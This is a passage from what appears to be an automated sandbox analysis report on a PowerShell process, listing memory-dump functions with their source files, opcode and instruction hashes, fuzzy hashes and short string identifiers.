                                                        • Opcode ID: 3023ca6f3ba749e85d3af4bdb12391d6c056644120580cb8f7855ad4713b33e0
                                                        • Instruction ID: 1cadb63d5571a52108f641159c2a0216a62c7ee6b1c3c3ef2638706325ea97d5
                                                        • Opcode Fuzzy Hash: 3023ca6f3ba749e85d3af4bdb12391d6c056644120580cb8f7855ad4713b33e0
                                                        • Instruction Fuzzy Hash: B901B1303052429FC72A9B68DA5446ABB72BEC620530584BEE242CB753CF35EC12CBC1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5F38 Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfb3c7a7a10f93d861deba2d700f2125f8f0018baee4026893131cd30f1008a9
                                                        • Instruction ID: 1dbe4a3648ccf403f3e376eb9cf6fcda8d4b4c12ac226c2ba67fd16b74b4478e
                                                        • Opcode Fuzzy Hash: bfb3c7a7a10f93d861deba2d700f2125f8f0018baee4026893131cd30f1008a9
                                                        • Instruction Fuzzy Hash: EE014030904209DFDB249FE0DA55AAEBBB2FF44302F21003DE202AB256DB754892CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5E17 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb60717339bdcc94b768924573c8c2211703037dfc9494ee914b98d3aaf741c1
                                                        • Instruction ID: bb355b74b5e69547886931fcf9331e27409d5bc28d1fab102a78bc4e1dec33b0
                                                        • Opcode Fuzzy Hash: cb60717339bdcc94b768924573c8c2211703037dfc9494ee914b98d3aaf741c1
                                                        • Instruction Fuzzy Hash: 32014030A01219DFDB24AFE0C915AAE7BB2EB44306F114039E602AA256DB754842CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F6093 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f68f31931968fdcc91da3214cd5165a3af0c6053b78c3d0666959336ce9efd6a
                                                        • Instruction ID: 9a5b223f39b0399131aaecd5ffcb26baef5bca2bac697f7070249e03ad173e60
                                                        • Opcode Fuzzy Hash: f68f31931968fdcc91da3214cd5165a3af0c6053b78c3d0666959336ce9efd6a
                                                        • Instruction Fuzzy Hash: 28F08C30A14209DFDB10DBE0DA55AAE3B75EF50305F21443EE2029B39BDE7558469B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D607B Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3cd51f14506c094b5a1dd064c1249e4ca9bba585e41b5a4c7f92a5ef6d41738
                                                        • Instruction ID: 0fa57631266d98eca68a20e8865beba809a4590bc00d900125567eb75754d7cd
                                                        • Opcode Fuzzy Hash: a3cd51f14506c094b5a1dd064c1249e4ca9bba585e41b5a4c7f92a5ef6d41738
                                                        • Instruction Fuzzy Hash: F3F04F75B04155EBCB10DE48C990DA6FB61ABD9355F18C0AAE5088F252DB33DC52CB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5EC0 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5ed9d27ff46e140f85d7408dfc3a87c4c82b9e9f6a5fc8164449228c9e8a9de
                                                        • Instruction ID: 4e24cdd8ec19852b95a5a5475b731370f4c36ef28b0019cb977a02d27b19c4fb
                                                        • Opcode Fuzzy Hash: e5ed9d27ff46e140f85d7408dfc3a87c4c82b9e9f6a5fc8164449228c9e8a9de
                                                        • Instruction Fuzzy Hash: 3DF03C34A11109DFCB24EFE0DA5AAAE7BB6FB48341F204139F602E7256DB744D52CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D60A8 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cddbdb5ed39ec331e0868b15862b7c03d0750388001520be118e3efceaec4bd
                                                        • Instruction ID: 5c525af7c2850b96eb24573956fe411eafe88469948ce9fc9b3a2ffde2a19b98
                                                        • Opcode Fuzzy Hash: 4cddbdb5ed39ec331e0868b15862b7c03d0750388001520be118e3efceaec4bd
                                                        • Instruction Fuzzy Hash: 18F09AE064D3C58FD7178B208CA5821BF30AE67140B1E81EBD084DF5E3EA199C0AC392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5E74 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93e6ef6083b55e835a6798c490943c11e955fb363f7857c75090c227c5229d34
                                                        • Instruction ID: bce74f9459537722a8b094cdab9ad9b91957939398878ccb711370ae170d1ce8
                                                        • Opcode Fuzzy Hash: 93e6ef6083b55e835a6798c490943c11e955fb363f7857c75090c227c5229d34
                                                        • Instruction Fuzzy Hash: 5DF03C31901119EFCB24AFE4DA15AADBFB2FB54341F204029F602E6256DB744852DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5F98 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1503333736f715df27f060d62b3e8a32116bd2ccb08577c5d9b1e9060fd306b0
                                                        • Instruction ID: e72b1529fa804fb7af4c0980107e921abc13710288fbf2938c5578f3bb414b2c
                                                        • Opcode Fuzzy Hash: 1503333736f715df27f060d62b3e8a32116bd2ccb08577c5d9b1e9060fd306b0
                                                        • Instruction Fuzzy Hash: C3F03C30D00109EFCB24AFE4DA55A9E7FB1FB48341F204029F612E7256DB744852CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F677B Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46177205566a321368710d2e56d5a84b0e23ef8da056bce8ba0e717192a90fad
                                                        • Instruction ID: 762f621ce301e453972e3f93a896312ec53af41c3f3cd049f9a2875cd26a5280
                                                        • Opcode Fuzzy Hash: 46177205566a321368710d2e56d5a84b0e23ef8da056bce8ba0e717192a90fad
                                                        • Instruction Fuzzy Hash: 28F0F975A001049FCB05CB88D990DBEF776FF88324F148159EA15A73A5C732AC52CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5DD3 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53bbbaa384da7fac7c88eb66ef3881d0edf474542372c81892b27167a0bd92a8
                                                        • Instruction ID: f442cbff61ff62fb31174846be871975ff5ce86b2727f9e37b8e369f90a7bec7
                                                        • Opcode Fuzzy Hash: 53bbbaa384da7fac7c88eb66ef3881d0edf474542372c81892b27167a0bd92a8
                                                        • Instruction Fuzzy Hash: 97F01231911209DFCF249FD4DA15A9DBFB6FB54341F204029F602EB256DB744D51DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5D90 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 004de2ff57dfa457d1a61ff9dbbe48563197bc777ec2df67a1434d2486e9129c
                                                        • Instruction ID: 7c985da37b28ed61a17b41104025be2e2e5982414577f8101584af3c1b01551a
                                                        • Opcode Fuzzy Hash: 004de2ff57dfa457d1a61ff9dbbe48563197bc777ec2df67a1434d2486e9129c
                                                        • Instruction Fuzzy Hash: 44F03031911209EFDF24DFE0DA5AAAE7FB5FB54341F204029F602EB256DB744852DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F60FD Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4539dd33c7417c49df1f3b211202ae883db9a1c28de7b2715a55a3b1a16d0703
                                                        • Instruction ID: a85da68ae043625e23f581bffe3f8331d1e17afdf90bcc4966162222e0b072f9
                                                        • Opcode Fuzzy Hash: 4539dd33c7417c49df1f3b211202ae883db9a1c28de7b2715a55a3b1a16d0703
                                                        • Instruction Fuzzy Hash: 71F0A030A40109EFCB20EFD0DA56A6E7B71FB44302F20402DF602AA24BDB784906CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5FE3 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c642b45d016380555330c55134bfa7010cc5bbe3548edca727b54488cf358f4
                                                        • Instruction ID: 158d3c508aedeb3e643c7f163cce6ca827bf5599ae429b917dcb103d292330cc
                                                        • Opcode Fuzzy Hash: 8c642b45d016380555330c55134bfa7010cc5bbe3548edca727b54488cf358f4
                                                        • Instruction Fuzzy Hash: 9CF0A030A40109EFCB20EFD0DA56AAE7B71FB44302F204029F602AB247DB784946CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F60D5 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a0bffc22eae11b5ee8e5d1181bee1081301533626d6dbfbf2ad5dc056c5311a
                                                        • Instruction ID: a36c1df69597c3710ec09d91e6383b151b20d067e61eb1c241558eb9e847bf3c
                                                        • Opcode Fuzzy Hash: 6a0bffc22eae11b5ee8e5d1181bee1081301533626d6dbfbf2ad5dc056c5311a
                                                        • Instruction Fuzzy Hash: B0E09230950109EFDB10AFD0DA56A6E7B35FB10302F20043DF202AA25BCBB489469B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F6045 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d89a5847fcd5693aa212f375f1139bb4a7a87970f91cd7c952fda08412994c2e
                                                        • Instruction ID: c8fc2defed5f08c36d3fdc497255efcaa40a8bda5966b9ef8dea6ebae51cd9ff
                                                        • Opcode Fuzzy Hash: d89a5847fcd5693aa212f375f1139bb4a7a87970f91cd7c952fda08412994c2e
                                                        • Instruction Fuzzy Hash: 1EE09230950109EFDB109FD0DA56A6E7B35FB10302F20042DF202AA257CBB489069B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F606B Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d89a5847fcd5693aa212f375f1139bb4a7a87970f91cd7c952fda08412994c2e
                                                        • Instruction ID: c8fc2defed5f08c36d3fdc497255efcaa40a8bda5966b9ef8dea6ebae51cd9ff
                                                        • Opcode Fuzzy Hash: d89a5847fcd5693aa212f375f1139bb4a7a87970f91cd7c952fda08412994c2e
                                                        • Instruction Fuzzy Hash: 1EE09230950109EFDB109FD0DA56A6E7B35FB10302F20042DF202AA257CBB489069B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5D84 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b68dae4bd2395d0c8549d8b7a60e07b22098fd9e5e94a9f15507cb412026b448
                                                        • Instruction ID: ad6cf7f17f038a62e56d8a4617a3625f925bb90327e934ce12da1731b5f75f2f
                                                        • Opcode Fuzzy Hash: b68dae4bd2395d0c8549d8b7a60e07b22098fd9e5e94a9f15507cb412026b448
                                                        • Instruction Fuzzy Hash: C2D05E3091120BEADB108F80C321B6F76706B1030AF31043ED202B5243DB7446058691
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 078DC9D5 Relevance: 14.0, Strings: 11, Instructions: 285COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$tPkq$tPkq$tPkq$tPkq$$kq$(qq$(qq$(qq$(qq
                                                        • API String ID: 0-610213911
                                                        • Opcode ID: 81754fa85feac38a4d4e6fc01371c152894eb0ebffca007ea9862b7c24a64d1b
                                                        • Instruction ID: 740b2a07f5e8fe3d6adcc1d966c4530138d95ec34c7f1fe60f305e33dc782273
                                                        • Opcode Fuzzy Hash: 81754fa85feac38a4d4e6fc01371c152894eb0ebffca007ea9862b7c24a64d1b
                                                        • Instruction Fuzzy Hash: CFA109B174021A9FCB24DF69C91476ABBA2AF94310F248855E905DF394CB31DC81D7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D5288 Relevance: 12.9, Strings: 10, Instructions: 393COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                        • API String ID: 0-3986695248
                                                        • Opcode ID: cca1281c3c6b624a721e58a1abf16905d7722e127ea38240d1db8fdd06ba696f
                                                        • Instruction ID: 36422db76cc7a84928b66e1b20b2b18bc4b87442373c33956418b580e4d4ef99
                                                        • Opcode Fuzzy Hash: cca1281c3c6b624a721e58a1abf16905d7722e127ea38240d1db8fdd06ba696f
                                                        • Instruction Fuzzy Hash: F7C147B170020A8FDB259E69D85067EBBE2AFE1210F24847BE406CB351EF71DCA5C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D27E0 Relevance: 12.8, Strings: 10, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$|l$|l
                                                        • API String ID: 0-4254497944
                                                        • Opcode ID: 89df8698c1c29e76cde57ac89d0552038fcdcb2593a7a2502e3874e236bd5e31
                                                        • Instruction ID: 190cb8a1766a8b902b8b136c18ff86a8de062c5254994edb3a56e142a4b2279a
                                                        • Opcode Fuzzy Hash: 89df8698c1c29e76cde57ac89d0552038fcdcb2593a7a2502e3874e236bd5e31
                                                        • Instruction Fuzzy Hash: 71A179B27043499FC7259F698910A6ABBA2FFE6320F2484ABD445CB391DA31DC45C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D4CB8 Relevance: 12.8, Strings: 10, Instructions: 307COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq
                                                        • API String ID: 0-1975867332
                                                        • Opcode ID: 67214884a66756e074de0f84c313f03ac31f174965340f252f45b528faaaee24
                                                        • Instruction ID: 60ce005bee14a78cd74ad0df42f0c7c805e4baf336c203d6aa4eb875cdaf0f63
                                                        • Opcode Fuzzy Hash: 67214884a66756e074de0f84c313f03ac31f174965340f252f45b528faaaee24
                                                        • Instruction Fuzzy Hash: A4A13AB1B002499FDB249F69C9106ABB7A2BFD9320F24846AD809CF394DF32DD55C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DD455 Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XRpq$XRpq$XRpq$tPkq$tPkq$$kq
                                                        • API String ID: 0-957243320
                                                        • Opcode ID: bd43e02110d258d383fa3e8703b438747acff2f817547202afddc8a97ae2fa7c
                                                        • Instruction ID: a8b53af21826c856f70f08899a89ead2bdeee8aafb8e374fdd112aaceef6337b
                                                        • Opcode Fuzzy Hash: bd43e02110d258d383fa3e8703b438747acff2f817547202afddc8a97ae2fa7c
                                                        • Instruction Fuzzy Hash: D861C4B170410A9FCB249FA8C504A6ABBA2ABD5314F24C4AAE445DF395CB31DC45CBF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DC4A4 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                        • API String ID: 0-1023320533
                                                        • Opcode ID: 740a67b58fc9214ee67fb7ec293e2a28befaa98728cced3630e7958c01eb809c
                                                        • Instruction ID: 62e4e01ebb95ff07279824770554b0211693349f5b9b71d9bde82d8142a079c5
                                                        • Opcode Fuzzy Hash: 740a67b58fc9214ee67fb7ec293e2a28befaa98728cced3630e7958c01eb809c
                                                        • Instruction Fuzzy Hash: 343132B670435A8FCB348E69941027BB7B6BFA6125B2444AAD412C6285DE36CC42C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D4C9D Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$tPkq$$kq$$kq$$kq
                                                        • API String ID: 0-296384169
                                                        • Opcode ID: dab3b4253a186145bd72a6973bcdc390c710109c90f819236c8b63aa396aa56f
                                                        • Instruction ID: ca1a77663e8e6631ae5d8a0a7681411063ec1f430716e449d3026c5b2bb6a3fc
                                                        • Opcode Fuzzy Hash: dab3b4253a186145bd72a6973bcdc390c710109c90f819236c8b63aa396aa56f
                                                        • Instruction Fuzzy Hash: B34116B0A00289EFDB24CE04C554BA6B7B2AF99334F18C5AADC1DDB295C735EC40CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D6E7D Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                        • API String ID: 0-1023320533
                                                        • Opcode ID: 0d9fcea0920b9246905bf4a649039afeea874f2b77c0bdc4b393ef34850263b3
                                                        • Instruction ID: c3b0918e64a76ceb0690feabde2d50389cf0eb9a3c4eecb08d2d4290bfcb115f
                                                        • Opcode Fuzzy Hash: 0d9fcea0920b9246905bf4a649039afeea874f2b77c0bdc4b393ef34850263b3
                                                        • Instruction Fuzzy Hash: B73144B270024ECFCF398E69D4401BAB7A2AFE5294B3484BEC401C7295FA36CC45C751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D5450 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$$kq$$kq$$kq$$kq
                                                        • API String ID: 0-567680802
                                                        • Opcode ID: 4cab69719d33cb09b9a4abacaf7dc46350fffffa277df8ae715440132620dd34
                                                        • Instruction ID: 89e79730c5b7fc9adfaae178cbfafa9c3f140b1de13469fd05166467ff2a3085
                                                        • Opcode Fuzzy Hash: 4cab69719d33cb09b9a4abacaf7dc46350fffffa277df8ae715440132620dd34
                                                        • Instruction Fuzzy Hash: 3221AEF562020ADBDF368E05C54463677B7AF71A66F68806BF805CB250D734DCA0CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D00F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq$$kq$$kq$|l$|l
                                                        • API String ID: 0-2615555025
                                                        • Opcode ID: d280623d448bb4df071ae2e4a4ea024b794d4b4420ca7f99e66e35467fda62b3
                                                        • Instruction ID: 86cf3eda9b299aee584c571e112d8e0794d048e11af964f903e77ddc46465fe6
                                                        • Opcode Fuzzy Hash: d280623d448bb4df071ae2e4a4ea024b794d4b4420ca7f99e66e35467fda62b3
                                                        • Instruction Fuzzy Hash: C211387170030A9BEF385D2AD804B27B7ABBBE1760F34842AE449CB391E936DC81C350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DBAE8 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (okq$(okq$(okq$(okq
                                                        • API String ID: 0-1817140900
                                                        • Opcode ID: 647a5db5bbbf08c95a6f9c954d38585c72f2a9ff9be928728de9d8f058f2d516
                                                        • Instruction ID: 62bdc8d53b015f17764b550919c28fd3e160c658d462cdb6a339ee27efd2d03f
                                                        • Opcode Fuzzy Hash: 647a5db5bbbf08c95a6f9c954d38585c72f2a9ff9be928728de9d8f058f2d516
                                                        • Instruction Fuzzy Hash: 04F137B1704349DFCB248F69C854BAABFA2BF95320F15846AE505CB3A1CB31DC44CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D2DE0 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq
                                                        • API String ID: 0-1293621312
                                                        • Opcode ID: af54db03eae5e9f3b7a48d43b84f565c99292e2975a72387b2fb5ca55e14086a
